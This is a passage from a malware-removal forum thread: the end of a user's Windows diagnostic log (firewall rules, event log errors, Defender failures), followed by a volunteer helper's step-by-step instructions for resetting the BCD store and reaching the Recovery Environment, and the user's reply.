FirewallRules: [TCP Query User{210A33E9-6B2B-44CF-BCF6-D34BC763A901}C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Allow) C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe

FirewallRules: [UDP Query User{BC1DE14B-4640-475C-A83B-879941C715F5}C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Allow) C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe

FirewallRules: [{207663F4-14AA-4B8C-8B75-0E34AECA606F}] => (Block) C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe

FirewallRules: [{5F89233A-ABDC-4FF1-9263-2D96AFE62121}] => (Block) C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe

FirewallRules: [TCP Query User{803AE086-7E6A-48E0-8802-785AA4FC4A01}C:\program file (x86) frostwire 6 - torrent & music downloader\frostwire 6\frostwire.exe] => (Allow) C:\program file (x86) frostwire 6 - torrent & music downloader\frostwire 6\frostwire.exe

FirewallRules: [UDP Query User{DD0732C4-EE26-4E6D-9566-D42C50E770DC}C:\program file (x86) frostwire 6 - torrent & music downloader\frostwire 6\frostwire.exe] => (Allow) C:\program file (x86) frostwire 6 - torrent & music downloader\frostwire 6\frostwire.exe

FirewallRules: [{92D3E127-A9C9-4A57-A4DE-C37C30EEC069}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\Video Download Capture.exe

FirewallRules: [{6D97C59F-C2D5-4B5F-A2EB-62DED9A63774}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\Video Download Capture.exe

FirewallRules: [{595BE6ED-4AE7-4E50-8492-81EF52DC503B}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftSrv.dll

FirewallRules: [{51406614-36DB-4932-854C-7354C320CCCE}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftSrv.dll

FirewallRules: [{0FD1A6F0-6892-4528-8D02-6DA308CE78B8}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftDump.dll

FirewallRules: [{F5C52100-551E-41EB-9F6B-22785A10B72E}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftDump.dll

FirewallRules: [{F90CFC89-D1E5-47FE-810D-4C2A003E3EC4}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftAC.dll

FirewallRules: [{B4D1EF72-3517-40C5-A216-D67E59703BD4}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftAC.dll

FirewallRules: [{95D8704A-2EE2-4ABF-A286-E107F9FE797F}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftPlayer.dll

FirewallRules: [{4819C0F7-D28C-465D-9F1B-E02D925E86AE}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftPlayer.dll

FirewallRules: [{FC9BC8BE-3785-41F0-9673-77798F53F411}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftDownloaderHelp.dll

FirewallRules: [{97D423F4-0FDF-4C9C-9062-3118615A659E}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftDownloaderHelp.dll

FirewallRules: [{F3617F33-975E-49A1-82F7-525FC3550128}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftHDSDump.dll

FirewallRules: [{A279D673-8345-423B-A713-D33AE6388178}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftHDSDump.dll

FirewallRules: [{2AC43D62-7AC9-47C0-9BAF-E92B1B7BBA30}] => (Allow) C:\Users\Dan\AppData\Local\Temp\Andy_45.5_x64\Setup.exe

FirewallRules: [{C12F076D-5E2B-450E-91A2-3D08D18E1937}] => (Allow) C:\Users\Dan\AppData\Local\Temp\Andy_45.5_x64\Setup.exe

FirewallRules: [{3D3CF842-8298-442A-B9C9-A5399B012E71}] => (Allow) C:\Program Files\Andy\andy.exe

FirewallRules: [{C31226E6-F861-4DEA-B2FD-2634BE6F0129}] => (Allow) C:\Program Files\Andy\andy.exe

FirewallRules: [{D12533D4-1609-4FAF-85BD-3A23601A19D7}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe

FirewallRules: [{C02EE326-2CB8-4B8B-85EE-B9EF5101D2FC}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe

FirewallRules: [{E6F43DE1-5773-4F5C-997C-8F9A152B8CC6}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe

FirewallRules: [{4A1A6E79-2801-44AC-93C6-A5698676BF58}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe

FirewallRules: [{447CC466-EC34-4DCC-9474-38A417083D49}] => (Allow) C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe

FirewallRules: [{B6E8D305-52B5-45E2-8C5A-2EE37A8ADB44}] => (Allow) C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe

FirewallRules: [{0649CB28-67B5-48B4-B97E-CDA231670A45}] => (Allow) C:\Program Files\Andy\HandyAndy.exe

FirewallRules: [{5BAD7087-DE25-4030-A16A-578CD107BD81}] => (Allow) C:\Program Files\Andy\HandyAndy.exe

FirewallRules: [{BF1E40F5-A2D7-4946-895B-E0067521547F}] => (Allow) C:\Program File (x86) WINAMP Radio & Music Player Browser - NEW Ver\Winamp\winamp.exe

FirewallRules: [{17ED7A00-1D80-4074-B1AB-25880A7BB6B6}] => (Allow) C:\Program File (x86) WINAMP Radio & Music Player Browser - NEW Ver\Winamp\winamp.exe

FirewallRules: [TCP Query User{396BBCA8-02CB-4338-8B42-915ECADCD922}C:\program file (x86) presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) C:\program file (x86) presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe

FirewallRules: [UDP Query User{73E87333-E910-4EEC-804C-17612FDD0764}C:\program file (x86) presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) C:\program file (x86) presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe

FirewallRules: [{9E3E9781-622A-4CDF-A7EF-F851961BEA19}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe

FirewallRules: [{7C52A72D-17FC-484E-A819-81F527082F0F}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\Resolve.exe

FirewallRules: [{5B94E67F-A6E7-4C37-B249-3CED37E49F0D}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\bmdpaneld.exe

FirewallRules: [{BA3F2295-A446-4372-A933-C67E6917CAA9}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\JLCooperPanelDaemon.exe

FirewallRules: [{AF2811BE-4318-4F7F-8F60-8E10AD92B8F2}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\EuphonixPanelDaemon.exe

FirewallRules: [{9D04EBDE-0FDE-4918-94E4-D40C3C002C6F}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\TangentPanelDaemon.exe

FirewallRules: [{BDA720FB-BED0-4342-84C3-1AF5017ECCAA}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\ElementsPanelDaemon.exe

FirewallRules: [{56DE631C-A030-4DF6-B707-2D24656517FF}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\DPDecoder.exe

FirewallRules: [{B0D56FFA-C1C5-488E-B442-2038AC05A5A6}] => (Allow) C:\ProgramData\Blackmagic Design\DaVinci Resolve\Support\QtDecoder\QTDecoder.exe

FirewallRules: [TCP Query User{80D1B33D-1849-4BEE-B7BB-78C9D2D3F544}C:\program file (x86) davinci 12.5 beta video edting software\dpdecoder.exe] => (Block) C:\program file (x86) davinci 12.5 beta video edting software\dpdecoder.exe

FirewallRules: [UDP Query User{B40DADB6-9E25-4951-B741-8458BE0396EE}C:\program file (x86) davinci 12.5 beta video edting software\dpdecoder.exe] => (Block) C:\program file (x86) davinci 12.5 beta video edting software\dpdecoder.exe

FirewallRules: [{9B19D861-CA78-446B-AD40-2E9AA11FDFB5}] => (Allow) C:\Program File (x86) VSDC Video Editor - Free\FlashIntegro\VideoEditor\VideoEditor.exe

FirewallRules: [{9A1FF358-15BA-4495-8972-7D4A585582FE}] => (Allow) C:\Program File (x86) VSDC Video Editor - Free\FlashIntegro\VideoEditor\VideoEditor.exe

FirewallRules: [{DFD16930-C6D4-42A7-8594-A07EAE59D209}] => (Allow) C:\Program File (x86) VSDC Video Editor - Free\FlashIntegro\VideoEditor\Updater.exe

FirewallRules: [{96FED481-82D0-450B-85C3-36735EB1549F}] => (Allow) C:\Program File (x86) VSDC Video Editor - Free\FlashIntegro\VideoEditor\Updater.exe

FirewallRules: [{17F50D30-FD50-46D0-BEE3-81847CF40C64}] => (Allow) 㩃停潲牧浡䘠汩獥睜湩晤湩層楷摮楦摮攮數

FirewallRules: [{96606CA1-E101-4434-AE0C-6C99B774D1CA}] => (Allow) 㩃停潲牧浡䘠汩獥睜湩晤湩層楷摮楦摮e

FirewallRules: [{D61EF620-8F0B-40A6-9BB7-E836DA310B7C}] => (Block) %SystemDrive%\Program File (x86) Adobe Premiere Pro CC - 2 - (Program)\Adobe Premiere Pro CC 2015\Adobe Premiere Pro.exe

FirewallRules: [{91606396-6288-43E6-AE6F-EEB421C75181}] => (Block) %SystemDrive%\Program File (x86) Adobe Premiere Pro CC - 2 - (Program)\Adobe Premiere Pro CC 2015\Adobe Premiere Pro.exe

FirewallRules: [{807550B5-7265-4327-9B16-266D34A7742C}] => (Block) %SystemDrive%\Program File (x86) Adobe After Effects CS6 - Video EfXs Program 2\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe

FirewallRules: [{EE7BB404-A2CF-4E23-A355-EA7C2D953145}] => (Block) %SystemDrive%\Program File (x86) Adobe After Effects CS6 - Video EfXs Program 2\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe

FirewallRules: [{7C716CAC-0CA5-496D-B6B1-DBB04F82E573}] => (Block) %ProgramFiles%\Adobe\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe

FirewallRules: [{047E31DF-A255-4F4C-9FE9-45DD54A3AB3B}] => (Block) %ProgramFiles%\Adobe\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe

FirewallRules: [{B06B32BA-F38C-4C17-B422-99E7605B0063}] => (Block) %ProgramFiles%\Adobe\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe

FirewallRules: [{E511541B-CD44-4376-A542-B6A6578FA8EE}] => (Block) %ProgramFiles%\Adobe\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe

FirewallRules: [{068BAA54-B58F-43B6-8ADB-31E4DEE03ACC}] => (Block) %ProgramFiles%\Adobe\Adobe Media Encoder CC 2015.3\Adobe Media Encoder.exe

FirewallRules: [{B44756B4-DFCA-4CC9-953C-CCE8AE6CC11A}] => (Block) %ProgramFiles%\Adobe\Adobe Media Encoder CC 2015.3\Adobe Media Encoder.exe

FirewallRules: [{3C331E6B-E428-4D0C-BEA4-0FA06032B9D0}] => (Block) %ProgramFiles% (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe

FirewallRules: [{D450C4CE-50CA-4D6B-A47C-AF19379507B1}] => (Block) %ProgramFiles% (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe

FirewallRules: [{640DFB21-833E-420D-B80D-AC0DD899B614}] => (Allow) C:\Program Files (x86)\SrpnFiles\SrpnFiles.exe

FirewallRules: [{6CAA584E-EA21-4F97-9554-1E5312569977}] => (Allow) C:\Program Files (x86)\SrpnFiles\SrpnFiles.exe

FirewallRules: [{099E93F9-CFBA-4E6D-A852-0EFDF6E69C77}] => (Allow) C:\Program Files (x86)\SrpnFiles\downloader.exe

FirewallRules: [{10B74A86-9FC5-4D84-955B-4B2C2FAADC83}] => (Allow) C:\Program Files (x86)\SrpnFiles\downloader.exe

FirewallRules: [{65FA2FF6-971C-44E8-8D5E-C565539E0181}] => (Block) %SystemDrive%\Program File (x86) CrazyTalk Animator 2 Pipeline 8.03.1620.1 + Crack [SadeemPC]\CrazyTalk Animator 2\CrazyTalk Animator 2\CrazyTalkAnimator.exe

FirewallRules: [{88078A39-6DBF-4310-9720-BC7A9811094B}] => (Block) %SystemDrive%\Program File (x86) CrazyTalk Animator 2 Pipeline 8.03.1620.1 + Crack [SadeemPC]\CrazyTalk Animator 2\CrazyTalk Animator 2\CrazyTalkAnimator.exe

FirewallRules: [{5D12474E-76BE-4D8A-8BD7-4CECA0F32CFB}] => (Allow) C:\Users\Dan\AppData\Local\Kometa\Application\kometa.exe

FirewallRules: [{814CAEF2-ADD6-4507-BAE2-55F6820A7994}] => (Allow) 㩃停潲牧浡䘠汩獥䝜湥牥捩桳楡汬屩敇敮楲獣慨汩楬攮數

FirewallRules: [{0E3753F1-E381-437A-BC70-0B47ECA113FA}] => (Allow) 㩃停潲牧浡䘠汩獥䝜湥牥捩桳楡汬屩敇敮楲獣慨汩楬e

FirewallRules: [{8269955E-0B8F-464C-B326-2023E770CABC}] => (Allow) C:\Program Files (x86)\Henwood\fontenot.exe

FirewallRules: [{3606180A-FA39-4B14-88F6-E879C8BB4B0B}] => (Allow) C:\Program Files (x86)\Police\fontenot.exe

FirewallRules: [{99FAD6CC-61D4-4806-B204-7F3641DDD7F3}] => (Block) %ProgramFiles% (x86)\FaceGen\Artist Pro\fgArtistPro.exe

FirewallRules: [{6CCE0F5A-ED5B-48E9-898C-B3168715BED1}] => (Block) %ProgramFiles% (x86)\FaceGen\Artist Pro\fgArtistPro.exe

FirewallRules: [TCP Query User{9536F0CC-5E66-46E8-805B-67D9697C530F}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe

FirewallRules: [UDP Query User{C5258519-221C-4A37-A687-51526258F672}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe

FirewallRules: [{5507329C-601E-4572-9AD8-6C16774E1ADC}] => (Allow) C:\Program File (x86) Firefox Web Browser Mozilla\firefox.exe

FirewallRules: [{187A8271-92D7-449D-8643-56ECD2671F9C}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe

FirewallRules: [{C260D9CD-8DD2-4B5A-8BDE-C4CFD01C9F25}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe

FirewallRules: [TCP Query User{DB1E8DAE-0016-43D8-BB69-DC8005FC9089}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe

FirewallRules: [UDP Query User{EA5A15E3-2AE2-47A4-AB76-6A52AAB47F97}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe

FirewallRules: [{31F2912A-119F-44BD-A9EB-53A4D506D23B}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

 

==================== Restore Points =========================

 

ATTENTION: System Restore is disabled

 

==================== Faulty Device Manager Devices =============

 

Name:

Description:

Class Guid:

Manufacturer:

Service:

Problem: : The drivers for this device are not installed. (Code 28)

Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

 

 

==================== Event log errors: =========================

 

Application errors:

==================

Error: (06/14/2018 09:24:00 PM) (Source: Application Hang) (EventID: 1002) (User: )

Description: The program LiveComm.exe version 17.5.9600.20911 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

 

Process ID: 704

 

Start Time: 01d40446cca2e74d

 

Termination Time: 4294967295

 

Application Path: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe

 

Report Id: c09f3b37-703a-11e8-8365-10c37bbb446b

 

Faulting package full name: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe

 

Faulting package-relative application ID: ppleae38af2e007f4358a809ac99a64a67c1

 

Error: (06/14/2018 08:54:34 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )

Description: Failed to schedule Software Protection service for re-start at 2118-05-22T00:54:34Z. Error Code: 0x80070020.

 

Error: (06/14/2018 08:53:36 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )

Description: Failed to schedule Software Protection service for re-start at 2118-05-22T00:53:36Z. Error Code: 0x80070020.

 

Error: (06/14/2018 08:53:06 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )

Description: Failed to schedule Software Protection service for re-start at 2118-05-22T00:53:06Z. Error Code: 0x80070020.

 

Error: (06/14/2018 08:52:36 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )

Description: Failed to schedule Software Protection service for re-start at 2118-05-22T00:52:36Z. Error Code: 0x80070020.

 

Error: (06/14/2018 08:52:06 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )

Description: Failed to schedule Software Protection service for re-start at 2118-05-22T00:52:05Z. Error Code: 0x80070020.

 

Error: (06/14/2018 08:51:35 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )

Description: Failed to schedule Software Protection service for re-start at 2118-05-22T00:51:35Z. Error Code: 0x80070020.

 

Error: (06/14/2018 08:50:07 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )

Description: Failed to schedule Software Protection service for re-start at 2118-05-22T00:50:07Z. Error Code: 0x80070020.

 

 

System errors:

=============

Error: (06/14/2018 09:27:06 PM) (Source: Service Control Manager) (EventID: 7000) (User: )

Description: The GamesAppIntegrationService service failed to start due to the following error:

The system cannot find the file specified.

 

Error: (06/14/2018 09:23:32 PM) (Source: Service Control Manager) (EventID: 7000) (User: )

Description: The 6320c4d4d9492959f6f8b43b8fdbf2f5 service failed to start due to the following error:

%%1053 = The service did not respond to the start or control request in a timely fashion.

 

Error: (06/14/2018 09:23:32 PM) (Source: Service Control Manager) (EventID: 7009) (User: )

Description: A timeout was reached (30000 milliseconds) while waiting for the 6320c4d4d9492959f6f8b43b8fdbf2f5 service to connect.

 

Error: (06/14/2018 09:23:30 PM) (Source: Service Control Manager) (EventID: 7000) (User: )

Description: The 6320c4d4d9492959f6f8b43b8fdbf2f5 service failed to start due to the following error:

%%1053 = The service did not respond to the start or control request in a timely fashion.

 

Error: (06/14/2018 09:23:30 PM) (Source: Service Control Manager) (EventID: 7009) (User: )

Description: A timeout was reached (30000 milliseconds) while waiting for the 6320c4d4d9492959f6f8b43b8fdbf2f5 service to connect.

 

Error: (06/14/2018 09:23:29 PM) (Source: Service Control Manager) (EventID: 7022) (User: )

Description: The VMware USB Arbitration Service service hung on starting.

 

Error: (06/14/2018 09:21:55 PM) (Source: Service Control Manager) (EventID: 7000) (User: )

Description: The Windows Defender Service service failed to start due to the following error:

%%577 = Windows cannot verify the digital signature for this file. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

Error: (06/14/2018 09:21:50 PM) (Source: DCOM) (EventID: 10010) (User: BEATLES)

Description: The server {1B1F472E-3221-4826-97DB-2C2324D389AE} did not register with DCOM within the required timeout.

 

 

Windows Defender:

===================================

Date: 2015-02-02 09:49:52.792

Description:

Windows Defender scan has been stopped before completion.

Scan ID: {4BF9AF7B-A43D-4E64-B277-DEFB56CDC0E3}

Scan Type: Antimalware

Scan Parameters: Quick Scan

 

Date: 2015-02-02 08:06:18.260

Description:

Windows Defender scan has been stopped before completion.

Scan ID: {16FD4F1F-550C-4A26-9400-0412629CFD5A}

Scan Type: Antimalware

Scan Parameters: Quick Scan

 

Date: 2015-02-01 10:17:58.118

Description:

Windows Defender scan has been stopped before completion.

Scan ID: {BADC4EF7-6BAD-444C-AB05-92085B6CF93D}

Scan Type: Antimalware

Scan Parameters: Quick Scan

 

Date: 2015-02-01 08:23:26.263

Description:

Windows Defender scan has been stopped before completion.

Scan ID: {C9B87AF6-96B3-4644-9422-EB0CED28391C}

Scan Type: Antimalware

Scan Parameters: Quick Scan

 

Date: 2015-01-31 08:30:36.872

Description:

Windows Defender scan has been stopped before completion.

Scan ID: {4D8C80CB-F50C-47EE-94E8-DC02EC0EE056}

Scan Type: Antimalware

Scan Parameters: Quick Scan

 

Date: 2015-02-01 05:57:28.954

Description:

Windows Defender has encountered an error trying to update signatures.

New Signature Version:

Previous Signature Version: 110.6.0.0

Update Source: Microsoft Malware Protection Center

Signature Type: Network Inspection System

Update Type: Full

Current Engine Version:

Previous Engine Version: 2.1.10302.0

Error code: 0x80072ee7

Error description: The server name or address could not be resolved

 

Date: 2015-02-01 05:57:28.938

Description:

Windows Defender has encountered an error trying to update signatures.

New Signature Version:

Previous Signature Version: 1.167.387.0

Update Source: Microsoft Malware Protection Center

Signature Type: AntiSpyware

Update Type: Full

Current Engine Version:

Previous Engine Version: 1.1.10302.0

Error code: 0x80072ee7

Error description: The server name or address could not be resolved

 

Date: 2015-02-01 05:57:28.938

Description:

Windows Defender has encountered an error trying to update signatures.

New Signature Version:

Previous Signature Version: 1.167.387.0

Update Source: Microsoft Malware Protection Center

Signature Type: AntiVirus

Update Type: Full

Current Engine Version:

Previous Engine Version: 1.1.10302.0

Error code: 0x80072ee7

Error description: The server name or address could not be resolved

 

Date: 2015-02-01 05:57:28.844

Description:

Windows Defender has encountered an error trying to update signatures.

New Signature Version:

Previous Signature Version: 1.167.387.0

Update Source: Microsoft Update Server

Signature Type: AntiVirus

Update Type: Full

Current Engine Version:

Previous Engine Version: 1.1.10302.0

Error code: 0x8024402c

Error description: An unexpected problem occurred while checking for updates. For information on installing or troubleshooting updates, see Help and Support.

 

Date: 2015-01-30 05:22:07.607

Description:

Windows Defender has encountered an error trying to update signatures.

New Signature Version:

Previous Signature Version: 110.6.0.0

Update Source: Microsoft Malware Protection Center

Signature Type: Network Inspection System

Update Type: Full

Current Engine Version:

Previous Engine Version: 2.1.10302.0

Error code: 0x80072ee7

Error description: The server name or address could not be resolved

 

CodeIntegrity:

===================================

 

Date: 2018-06-14 21:21:55.250

Description:

Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

Date: 2018-06-14 20:58:29.626

Description:

Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

Date: 2018-06-14 20:25:40.819

Description:

Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

Date: 2018-06-14 20:22:09.624

Description:

Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

Date: 2018-06-13 20:18:20.846

Description:

Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

Date: 2018-06-12 20:36:48.243

Description:

Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

Date: 2018-06-12 20:16:24.029

Description:

Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

Date: 2018-06-11 21:40:11.899

Description:

Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

==================== Memory info ===========================

 

Processor: Intel® Celeron® CPU N2830 @ 2.16GHz

Percentage of memory in use: 49%

Total physical RAM: 3982.68 MB

Available physical RAM: 2029.46 MB

Total Virtual: 4686.68 MB

Available Virtual: 2812.33 MB

 

==================== Drives ================================

 

Drive c: (OS) (Fixed) (Total:444.65 GB) (Free:143.57 GB) NTFS ==>[system with boot components (obtained from drive)]

Drive d: () (Removable) (Total:7.45 GB) (Free:2.87 GB) FAT32

 

\\?\Volume{3e80ab0f-bf50-4f22-8c02-3c22ee1a6bb4}\ (Recovery) (Fixed) (Total:0.88 GB) (Free:0.59 GB) NTFS

\\?\Volume{436d9e19-7fb5-4350-864c-86573ec335b2}\ () (Fixed) (Total:0 GB) (Free:0 GB)

 

==================== MBR & Partition Table ==================

 

========================================================

Disk: 0 (Size: 465.8 GB) (Disk ID: 3F7852A4)

 

Partition: GPT.

 

========================================================

Disk: 1 (Protective MBR) (Size: 7.5 GB) (Disk ID: 00000000)

 

Partition: GPT.

 

==================== End of Addition.txt ============================



#34 RayS

  • Malware Response Team

Posted 17 June 2018 - 02:09 AM

Hi Dan,
 

"All the past Command Prompts were not done by the method link you sent because it doesn't work for my laptop."

I can't see your computer, so it's not enough to say "it doesn't work". You need to tell me what steps you tried and which step failed. Also describe as much as possible about the failure. Give me the error message(s) verbatim, if any. Even if there are no error messages, tell me what you see on screen.
 

"had to copy and paste it in word because the computer I'm using during the day can't open notepad."

Word is not reliable for our purposes because it can substitute its own characters for some of the characters in the original logs. Normally wait until you have access to Notepad or attach the log files to your posts. In this one instance today, I am asking for a very simple log (BCD_Reset.txt). It's OK this one time to use Word, if necessary.
 
Overview
I want to reset the BCD store again in normal boot using the attached Batch file (BCDReset.bat). Then I want to try to enter Recovery Environment by aborting start-up two consecutive times.

 

Here's the Batch file: 
 
Please read this all the way through before you begin.
 
Reset BCD store

  1. Please copy the attached Batch file onto the root directory of your thumb drive.
  2. Insert the thumb drive into your sick laptop.
  3. Start your sick laptop and use Windows Explorer to find the drive letter of your thumb drive when it is in your sick laptop. The drive letter will probably be D:\
  4. Press your Windows key and type Command Prompt into the search box.
  5. Right-click Command Prompt in your search results and select Run as administrator  <== Important!
  6. When the black Command Prompt window opens, be sure the title of the window is Administrator: Command Prompt
  7. If the title of the window is not Administrator: Command Prompt then you did something wrong. Close the black Command Prompt window and go back to step 4 and try again (be sure to right-click).
  8. Type D:\BCDreset into the Command Prompt window and press Enter. If your thumb drive is on some other letter, then type that letter instead of D.
  9. You should see Success in the Command Prompt window.
  10. You should also see a file called BCD_Reset.txt on your thumb drive.
  11. Copy and paste the contents of BCD_Reset.txt into your reply.

Consecutive Power Interruptions
Note: If you see the black screen with the circling dots going around, that means you didn't interrupt the boot-up process quickly enough in step 3 below.

  1. Begin with your sick laptop completely shut down (power OFF).
  2. Press the physical power button to begin the boot-up process.
  3. After only 3 or 4 seconds, press and hold the power button for a minimum of six seconds to shut down your laptop.
  4. Repeat steps 1 through 3 a second time.
  5. Press the power button again to begin the boot-up process for a third time and let it continue to completion.

If all went well, you should see Preparing Automatic Repair on a black screen. After a short delay, you should see Diagnosing your PC.

  • On the Automatic Repair screen, click Advanced options.
  • On the next screen, click Troubleshoot.
  • On the next screen, click Advanced options.
  • On the next screen, click Command Prompt.

Do you see x:\windows\system32> and a blinking cursor? If you don't see this, stop here and describe all symptoms. What step failed and what did you see?
 
 
In your next reply...

  • Copy and paste the entire contents of BCD_Reset.txt into the body of your message.
  • If you can't find BCD_Reset.txt in the root directory of your thumb drive or if you didn't see Success when you tried to reset BCD store, tell me what step failed and what did you see. Give me a full description.
  • Did you see x:\windows\system32> and a blinking cursor? If not, which step failed? What did you see? Give me a full description.

Thank you,
 
Ray


I don't accept payment for my help, but it would please me if you perform a kindness for your neighbor. You might also contact your local animal shelter. They can always use a bag of kibble or a few cans of pet food. Who knows... you might even find a life-long furry friend there.


#35 danban


Posted 17 June 2018 - 06:00 PM

Hello Ray ,

This is Dan.

 

Ok ,

Give me 1-2 days so I have access to Notepad but also a printer,

so I can print all the instructions to paper to read off when I'm doing the directions to boot up.

 

Also when I right click on Windows 8, there are 2 commands,

Command Prompt and Command Prompt Administrator.

The first one was the one I have been using the past times even though it only goes in normal boot mode

but can't get past the Command Prompt Administrator, it asks me for permission and it blocks me.

 

I will work on your new method regardless and see if that works.

 

Best ,

Dan



#36 RayS


Posted 18 June 2018 - 07:39 AM

Hi Dan,
 

can't get past the Command Prompt Administrator, it asks me for permission and it blocks me.

I'll tell you again: I can't see your computer. In all cases when a step fails or is blocked, I need to know exactly what messages you see on screen. Write the messages down word-for-word and send them to me. Describe fully what happened.
 
 

Also when I right click on Windows 8, there are 2 commands, Command Prompt and Command Prompt Administrator. The first one was the one I have been using the past times even though it only goes in normal boot mode

The commands for resetting the BCD store absolutely require Command Prompt running as administrator. If you don't run as administrator, the commands will definitely fail and you will not be allowed to open Recovery Environment in the next steps. The attached file (GP_Edit.reg) will configure your Command Prompt to always run as administrator.
